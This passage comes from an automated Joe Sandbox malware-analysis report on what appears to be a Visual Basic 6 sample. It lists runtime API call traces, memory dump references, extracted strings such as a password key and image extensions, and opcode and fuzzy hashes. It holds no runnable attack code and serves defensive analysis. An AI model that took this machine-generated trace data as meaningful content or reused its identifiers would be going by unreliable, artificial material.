                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041C3D7
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041C3E0
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041C3E9
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 0041C406
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$Move$Error$Ansi$BoundsFixstrGenerate$#578CopyDestructListLsetOverflowSystem
                                                                                    • String ID: *.dat$59ABCQEF01$["szPW"]
                                                                                    • API String ID: 806118442-2789598873
                                                                                    • Opcode ID: a5ac6cd11d6c4d803174f6a91ff4b35df35804981069048ccf288ae3b20bb73f
                                                                                    • Instruction ID: e520ffca7d995d5c9d8e1e4b7866a297511e66e05a072c8871b128296ca8dfb1
                                                                                    • Opcode Fuzzy Hash: a5ac6cd11d6c4d803174f6a91ff4b35df35804981069048ccf288ae3b20bb73f
                                                                                    • Instruction Fuzzy Hash: 78D10C71A00258EFDB14DFA0DE88BDEB775EB48301F1081A9E50AB72A0DB745E85CF19
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041A99E
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0041A9CE
                                                                                    • __vbaAryConstruct2.MSVBVM60(?,00408078,00000003,?,00000000,?,00000000,Function_000032B6), ref: 0041A9DF
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,Function_000032B6), ref: 0041A9EE
                                                                                    • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,00000000,?,00000000,Function_000032B6), ref: 0041AA0A
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 0041AA44
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041AA5A
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 0041AA73
                                                                                    • #525.MSVBVM60(00000104), ref: 0041AA9C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041AAA7
                                                                                    • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0041AADE
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041AB1D
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000,000001F4), ref: 0041AB38
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041AB5E
                                                                                    • __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000), ref: 0041AB6F
                                                                                    • __vbaFreeStr.MSVBVM60(?,00000000), ref: 0041AB84
                                                                                    • #616.MSVBVM60(00000000,?,?,00000000), ref: 0041AB99
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041ABA7
                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 0041ABBE
                                                                                    • __vbaFreeStr.MSVBVM60(?,00000000), ref: 0041ABCA
                                                                                    • #517.MSVBVM60(?,?,00000000), ref: 0041ABDB
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041ABE9
                                                                                    • #517.MSVBVM60(?,00000000,?,00000000), ref: 0041ABF7
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041AC05
                                                                                    • __vbaStrCmp.MSVBVM60(00000000,?,00000000), ref: 0041AC0C
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 0041AC30
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(00405598,?,?,?,00000000,Function_000032B6), ref: 0041AC77
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0041AC8D
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(00405598,?,?,?,00000000,Function_000032B6), ref: 0041ACA6
                                                                                    • __vbaSetSystemError.MSVBVM60(?), ref: 0041ACCA
                                                                                    • __vbaFreeStr.MSVBVM60(0041AD37), ref: 0041AD03
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041AD1B
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041AD24
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041AD30
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$FreeSystem$AnsiMove$#517$#525#616BoundsChkstkConstruct2CopyDestructGenerateListUnicode
                                                                                    • String ID: *.dat$+$00000$59ABCQEF01$["szPW"]$d/m/yy h:m$system\$yymmdd
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 004190EE
                                                                                    • __vbaStrCopy.MSVBVM60(00000000,?,?,00000000,Function_000032B6), ref: 0041911B
                                                                                    • __vbaOnError.MSVBVM60(000000FF), ref: 0041912A
                                                                                    • #618.MSVBVM60(?,00000004), ref: 0041913D
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00419148
                                                                                    • #517.MSVBVM60(00000000), ref: 0041914F
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041915A
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00419163
                                                                                    • __vbaStrCmp.MSVBVM60(.png,?), ref: 00419179
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00419192
                                                                                    • __vbaStrCmp.MSVBVM60(.gif,?), ref: 004191AD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004191C6
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,?), ref: 004192FA
                                                                                    • #644.MSVBVM60(?,?,?), ref: 0041932B
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 0041934A
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?), ref: 0041936F
                                                                                    • __vbaFreeStr.MSVBVM60(004193A2), ref: 00419389
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00419392
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041939B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$ErrorFree$CopySystem$Move$#517#618#644Chkstk
                                                                                    • String ID: .bmp$.gif$.jpg$.png$.tif$image/bmp$image/gif$image/jpeg$image/png$image/tiff$jpeg$tiff
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(660E1A08,00000000,660E6C4A), ref: 004260E5
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004260ED
                                                                                    • __vbaOnError.MSVBVM60(00000001), ref: 004260F1
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00426110
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 00426121
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0042612B
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0042613A
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000,?), ref: 0042616D
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000006,?,00000000), ref: 00426183
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000010,?,00000000), ref: 00426199
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 004261B0
                                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 004261C6
                                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 004261D7
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004261F4
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00426203
                                                                                    • __vbaSetSystemError.MSVBVM60(?,3F800000,?,?,00000000), ref: 00426224
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 0042622A
                                                                                    • __vbaSetSystemError.MSVBVM60(?), ref: 00426239
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 0042624E
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 00426259
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00426263
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00426272
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 004262D8
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 004262EB
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 0042630A
                                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 00426314
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00426331
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00426339
                                                                                    • __vbaUbound.MSVBVM60(00000001,?,?,00000000), ref: 0042634D
                                                                                    • __vbaSetSystemError.MSVBVM60(?,3F800000,00000000), ref: 00426366
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00426372
                                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 0042637C
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0042639C
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004263AD
                                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,3F800004,?), ref: 004263D5
                                                                                    • __vbaSetSystemError.MSVBVM60(?), ref: 004263E5
                                                                                    • __vbaExitProc.MSVBVM60 ref: 004263EE
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00426410
                                                                                    • __vbaExitProc.MSVBVM60 ref: 00426419
                                                                                    • __vbaFreeStr.MSVBVM60(00426466), ref: 00426443
                                                                                    • __vbaRecDestruct.MSVBVM60(00407F10,?), ref: 0042644E
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042645A
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00426463
                                                                                      • Part of subcall function 00426480: __vbaSetSystemError.MSVBVM60(00000000,?,00000006,?,00000000,?,00426152,?), ref: 004264B4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$System$BoundsGenerate$Free$LockUnlock$AnsiCopyDestructExitProcUnicode$RedimUbound
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000,00000000), ref: 004206C8
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000), ref: 004206D0
                                                                                    • __vbaOnError.MSVBVM60(00000001), ref: 004206D4
                                                                                    • #648.MSVBVM60(0000000A), ref: 004206EC
                                                                                    • __vbaFreeVar.MSVBVM60(?,00000000), ref: 004206FB
                                                                                    • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000,?), ref: 00420714
                                                                                    • __vbaLenBstr.MSVBVM60(00405414), ref: 0042071F
                                                                                    • #525.MSVBVM60(00000000), ref: 00420726
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 00420737
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 0042074B
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000), ref: 00420755
                                                                                      • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00420765
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
                                                                                      • Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
                                                                                      • Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 00420776
                                                                                    • __vbaStrCmp.MSVBVM60(00000000), ref: 00420779
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00420797
                                                                                    • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 004207C6
                                                                                    • __vbaLenBstr.MSVBVM60(00405414), ref: 004207CD
                                                                                    • __vbaGet3.MSVBVM60(00000004,0042C250,00000000), ref: 00420815
                                                                                    • #525.MSVBVM60(00000000), ref: 0042081E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0042082B
                                                                                    • __vbaGet3.MSVBVM60(00000000,0042C254,00000000), ref: 0042083C
                                                                                    • __vbaGet3.MSVBVM60(00000004,0042C1C0,00000000), ref: 0042084C
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00420861
                                                                                    • #648.MSVBVM60(0000000A), ref: 00420879
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00420888
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?), ref: 00420899
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004208A4
                                                                                    • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,00000000), ref: 004208B6
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004208BF
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004208E1
                                                                                    • __vbaUI1I2.MSVBVM60 ref: 004208EC
                                                                                    • __vbaUI1I2.MSVBVM60 ref: 00420918
                                                                                    • __vbaUI1I2.MSVBVM60 ref: 00420922
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$Move$Get3$Copy$#516#631Bstr$#525#648ErrorFileOpen$#537BoundsGenerateList
                                                                                    • String ID:
                                                                                    • API String ID: 695521769-0
                                                                                    • Opcode ID: f8ef0d2bbbc17cc47077afd85e451489e7cc431014dfc9b52aac7517ad6bcadf
                                                                                    • Instruction ID: 7f18cb6a5bab86a65f3f7d37ad3edf1072490e8e3ae84fdb7564aa9c634781f6
                                                                                    • Opcode Fuzzy Hash: f8ef0d2bbbc17cc47077afd85e451489e7cc431014dfc9b52aac7517ad6bcadf
                                                                                    • Instruction Fuzzy Hash: ADA1C071E00258DBCB14EFE5ED84ADEBBB5FF48300F50412AE516AB2A1DB745885CF68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,00000000,004032B6), ref: 00422C0E
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004032B6), ref: 00422C3B
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004032B6), ref: 00422C4A
                                                                                    • #648.MSVBVM60(0000000A), ref: 00422C69
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00422C78
                                                                                    • __vbaI2I4.MSVBVM60(?), ref: 00422C8C
                                                                                    • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00422C9A
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00422CAA
                                                                                    • #570.MSVBVM60(00000000), ref: 00422CB1
                                                                                    • __vbaLenBstr.MSVBVM60(0040545C), ref: 00422CBE
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00422CF3
                                                                                    • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 00422CFE
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00422D0E
                                                                                    • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 00422D1B
                                                                                    • __vbaLenBstr.MSVBVM60(0040545C), ref: 00422D39
                                                                                    • __vbaLenBstr.MSVBVM60(0040545C), ref: 00422D67
                                                                                    • #525.MSVBVM60(00000000), ref: 00422D6E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00422D79
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00422D89
                                                                                    • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 00422D94
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00422DA4
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00422DB1
                                                                                      • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00422DCC
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00422DEA
                                                                                    • __vbaStrMove.MSVBVM60(00000003), ref: 00422DFB
                                                                                    • #616.MSVBVM60(00000000), ref: 00422E02
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00422E0D
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
                                                                                      • Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
                                                                                      • Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 00422E22
                                                                                    • __vbaStrCmp.MSVBVM60(00000000), ref: 00422E29
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00422E50
                                                                                      • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 0041189C
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(004118D5), ref: 004118CE
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000000), ref: 00422E76
                                                                                    • __vbaStrMove.MSVBVM60(00000004), ref: 00422E97
                                                                                    • #618.MSVBVM60(00000000), ref: 00422E9E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00422EA9
                                                                                    • __vbaI4Str.MSVBVM60(00000000), ref: 00422EB0
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00422EC7
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00422EDA
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00422EE1
                                                                                    • __vbaFreeStr.MSVBVM60(00422F2A), ref: 00422F1A
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00422F23
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 00422F40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$FreeMove$BstrFile$#516#631Copy$ErrorGet3ListSeek$#525#537#570#616#618#648ChkstkCloseOpenOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 277344030-0
                                                                                    • Opcode ID: 80d27adf0f7515f30dffb66509e59b70ef8c6a723e0b90cbf6394fe901ba1ca0
                                                                                    • Instruction ID: 0dbf9007f3e025cc507390632291acf7cd708b816fac69f1e160cd6eff4667e3
                                                                                    • Opcode Fuzzy Hash: 80d27adf0f7515f30dffb66509e59b70ef8c6a723e0b90cbf6394fe901ba1ca0
                                                                                    • Instruction Fuzzy Hash: 8091C871D00248EFDB04DFA0DA48BDEBBB8FB48705F108169E612B76A0DB745A49CF64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaOnError.MSVBVM60(00000001), ref: 0040D69B
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D6B2
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004082BC,0000004C), ref: 0040D6D3
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040D6FA
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D724
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004082BC,00000040), ref: 0040D749
                                                                                    • __vbaLateIdCallLd.MSVBVM60(?,?,68030000,00000000), ref: 0040D75E
                                                                                    • __vbaI4Var.MSVBVM60(00000000), ref: 0040D768
                                                                                    • __vbaLateMemCallLd.MSVBVM60(?,?,hwnd,00000000,00008003), ref: 0040D78A
                                                                                    • __vbaVarTstEq.MSVBVM60(00000000), ref: 0040D794
                                                                                    • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040D7A2
                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0040D7B2
                                                                                    • __vbaExitProc.MSVBVM60 ref: 0040D7DF
                                                                                    • __vbaExitProc.MSVBVM60 ref: 0040D7EC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$CallCheckExitHresultLateListProc$Error
                                                                                    • String ID: MR$ RO$Once$hwnd
                                                                                    • API String ID: 1721777011-1584818490
                                                                                    • Opcode ID: f1c211779c0b3bb3b88594b85937cb88ccef8d8afbaf8a30aea8c47be55a5225
                                                                                    • Instruction ID: 3a18aed98be3068f103a5839567168951ce735157339c65100099b40d738d62c
                                                                                    • Opcode Fuzzy Hash: f1c211779c0b3bb3b88594b85937cb88ccef8d8afbaf8a30aea8c47be55a5225
                                                                                    • Instruction Fuzzy Hash: 24B10771900204EBDB04DFE4DD49BAEBBB8FF48700F50816AE505B72A1DB785945CBA9
                                                                                    Uniqueness

